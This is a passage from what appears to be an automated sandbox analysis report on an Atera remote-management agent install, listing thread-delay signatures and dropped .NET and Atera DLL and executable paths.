                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587843
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587715
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587481
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587375
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587263
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587156
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587046
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 586933
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 586827
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 598572
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 5693
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 3805
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 7649
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 1911
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 5379
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 1873
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeWindow / User API: threadDelayed 7251
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeWindow / User API: threadDelayed 2566
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWindow / User API: threadDelayed 1638
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWindow / User API: threadDelayed 2503
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 1323
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeWindow / User API: threadDelayed 7309
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeWindow / User API: threadDelayed 2259
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeWindow / User API: threadDelayed 1123
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeWindow / User API: threadDelayed 809
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWindow / User API: threadDelayed 3610
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI48B.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Intrinsics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.CSharp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Registry.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICBCF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7187.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\hostpolicy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB4E8.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB4E8.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI64A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Console.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Uri.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB4E8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 4c9997.rbf (copy)Jump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceProcess.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\dotnet.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Dataflow.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Brotli.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 4c999b.rbf (copy)Jump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Expressions.dllJump to dropped file
